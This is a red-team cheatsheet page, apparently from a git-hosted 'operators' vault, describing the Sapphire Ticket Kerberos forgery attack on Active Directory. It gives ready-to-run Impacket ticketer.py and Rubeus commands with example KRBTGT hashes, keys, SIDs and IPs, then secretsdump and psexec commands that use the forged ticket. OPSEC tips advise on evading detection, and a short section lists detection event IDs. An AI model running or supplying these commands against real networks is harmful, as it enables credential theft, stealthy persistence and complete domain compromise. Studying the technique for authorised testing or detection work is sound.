daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-14-sapphire-ticket-attack.md (7336B)


      1 ---
      2 title: "Attack #14 β€” Sapphire Ticket Attack"
      3 description: "The Sapphire Ticket is the most OPSEC-friendly ticket forging technique in the Kerberos attack family. It addresses the final detection gap that Diamond…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation"]
      7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #14 β€” Sapphire Ticket Attack.md"
     11 ---
     12 # 🟠 Attack #14 β€” Sapphire Ticket Attack
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The Sapphire Ticket is **the most OPSEC-friendly ticket forging technique** in the Kerberos attack family. It addresses the final detection gap that Diamond Tickets still have β€” fabricated PAC data. While Diamond Tickets modify a legitimate TGT's PAC with attacker-chosen group memberships (which can be detected by comparing PAC claims against actual AD group memberships), the Sapphire Ticket obtains a **real, legitimate PAC** belonging to the target high-privileged user via the **S4U2Self + User-to-User (U2U)** protocol extensions, then grafts that authentic PAC into a forged TGT.
     19 
     20 ### Ticket Evolution β€” From Golden to Sapphire
     21 
     22 | Ticket Type | PAC Source | AS-REQ Present? | Detection Difficulty |
     23 |---|---|---|---|
     24 | **Golden** | Entirely fabricated | ❌ No | Easy β€” missing AS-REQ + fake PAC |
     25 | **Silver** | Entirely fabricated | N/A (TGS only) | Medium β€” no DC events, but PAC validation catches it |
     26 | **Diamond** | Modified from real (but groups changed) | βœ… Yes | Hard β€” has AS-REQ, but PAC groups mismatch AD |
     27 | **Sapphire** | Real PAC obtained via S4U2Self+U2U | βœ… Yes | Very Hard β€” everything is legitimate |
     28 
     29 ### How It Works Step-by-Step
     30 
     31 ```
     32 1. Obtain KRBTGT AES256 key (via DCSync)
     33 2. Request a legitimate TGT for your controlled user (real AS-REQ)
     34 3. Use S4U2Self + U2U to request a service ticket to yourself on behalf of
     35    the target privileged user (e.g., Administrator)
     36 4. This returns a REAL PAC belonging to Administrator β€” with genuine group
     37    memberships signed by the DC
     38 5. Extract the PAC from the S4U2Self response
     39 6. Decrypt your TGT, replace YOUR PAC with Administrator's REAL PAC
     40 7. Re-encrypt and re-sign the TGT
     41 8. Result: Your TGT now carries Administrator's genuine PAC β€” undetectable
     42    by PAC inspection because the PAC data is 100% real
     43 ```
     44 
     45 ***
     46 
     47 ## βš™οΈ Prerequisites
     48 
     49 | Requirement | Detail |
     50 |---|---|
     51 | **KRBTGT AES256 key** | Required for TGT decryption and re-encryption |
     52 | **Domain Admin or DCSync rights** | To extract the KRBTGT key |
     53 | **Valid domain user account** | For the initial AS-REQ and S4U2Self request |
     54 | **Target user must exist** | The S4U2Self request queries the DC for the real PAC |
     55 
     56 ***
     57 
     58 ## πŸ› οΈ Tools
     59 
     60 | Tool | Platform | Notes |
     61 |---|---|---|
     62 | **Impacket β€” ticketer.py** | Linux | `-impersonate` flag performs Sapphire Ticket attack |
     63 | **Rubeus** | Windows | Can be used for the S4U2Self+U2U flow manually |
     64 | **Mimikatz** | Windows | DCSync for KRBTGT key extraction |
     65 
     66 ***
     67 
     68 ## πŸ’» Full Commands
     69 
     70 ### πŸ”΄ Impacket β€” ticketer.py (Linux β€” Primary Method)
     71 
     72 ```bash
     73 # ── Sapphire Ticket β€” forge TGT with real Administrator PAC ───────────────────
     74 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
     75   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
     76   -domain corp.local \
     77   -impersonate Administrator \
     78   -dc-ip 10.10.10.10 \
     79   low_user
     80 
     81 # Flags:
     82 # -nthash       = KRBTGT NT hash
     83 # -impersonate  = Target user whose REAL PAC to obtain via S4U2Self+U2U
     84 # -dc-ip        = DC to query for the S4U2Self request
     85 # low_user      = Your controlled user for the base TGT
     86 
     87 # ── Using AES key (preferred) ─────────────────────────────────────────────────
     88 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
     89   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
     90   -domain corp.local \
     91   -impersonate Administrator \
     92   -dc-ip 10.10.10.10 \
     93   low_user
     94 
     95 # ── Use the Sapphire Ticket ───────────────────────────────────────────────────
     96 export KRB5CCNAME=low_user.ccache
     97 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
     98 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
     99 ```
    100 
    101 ### πŸ”΄ Manual S4U2Self + U2U Flow (Rubeus β€” Windows)
    102 
    103 ```powershell
    104 # ── Step 1: Request legitimate TGT ────────────────────────────────────────────
    105 .\Rubeus.exe asktgt /user:low_user /password:Password1 /enctype:aes256 /nowrap /outfile:low_user.kirbi
    106 
    107 # ── Step 2: Use S4U2Self+U2U to get Administrator's PAC ──────────────────────
    108 .\Rubeus.exe s4u /self /user:low_user /impersonateuser:Administrator /ticket:low_user.kirbi /nowrap
    109 
    110 # ── Step 3: Manual PAC extraction and TGT modification (requires custom tooling)
    111 # The PAC from the S4U2Self response contains Administrator's real group memberships
    112 # Graft this PAC into the original TGT using KRBTGT key
    113 
    114 # Note: Rubeus does not have a single-command "sapphire" option like Diamond
    115 # The Impacket ticketer.py with -impersonate is the cleanest approach
    116 ```
    117 
    118 ***
    119 
    120 ## 🎯 OPSEC Tips
    121 
    122 - **Sapphire Ticket is virtually undetectable** β€” the PAC is real (signed by the DC), the AS-REQ is real, and the TGT encryption is correct
    123 - **The S4U2Self+U2U request IS logged** β€” Event 4769 shows a service ticket request, but this is normal protocol behavior and hard to distinguish from legitimate traffic
    124 - **AES encryption is mandatory** for maximum stealth
    125 - **Sapphire > Diamond > Golden** β€” always prefer Sapphire when possible for the most OPSEC-safe persistence
    126 
    127 ***
    128 
    129 ## πŸ›‘οΈ Detection β€” Event IDs
    130 
    131 | Event ID | Source | What to Look For |
    132 |---|---|---|
    133 | **4768** | Security Log (DC) | TGT request β€” present (legitimate AS-REQ) |
    134 | **4769** | Security Log (DC) | S4U2Self service ticket request β€” watch for U2U patterns from non-service accounts |
    135 | **4624** | Security Log | Logon with elevated privileges from unexpected user/host |
    136 
    137 **Primary detection challenge:** Sapphire Tickets are the hardest to detect because every component is legitimate β€” the AS-REQ, the PAC data, and the encryption. Detection must focus on **behavioral analysis** β€” why is a low-privilege user suddenly accessing DA-protected resources? The S4U2Self+U2U request pattern from a non-service account is the only technical indicator, but it's subtle.
    138 
    139 ***
    140 
    141 ## πŸ”— Attack Chain Context
    142 
    143 ```
    144 [Sapphire Ticket] ──→ Most Stealthy Domain Persistence
    145          β”‚
    146          β”œβ”€β”€β†’ πŸ”‘ Real PAC + Real AS-REQ = virtually undetectable
    147          β”œβ”€β”€β†’ 🩸 Use as DA β†’ DCSync β†’ complete domain compromise
    148          β”œβ”€β”€β†’ πŸ”’ Only defeated by KRBTGT reset Γ— 2
    149          β”œβ”€β”€β†’ πŸ”— Chain: DCSync β†’ get KRBTGT key β†’ Sapphire Ticket
    150          └──→ πŸ“Š OPSEC ranking: Sapphire > Diamond > Golden
    151 ```
    152 
    153 ***
    154 
    155 > βœ… **Attack #14 β€” Sapphire Ticket complete.**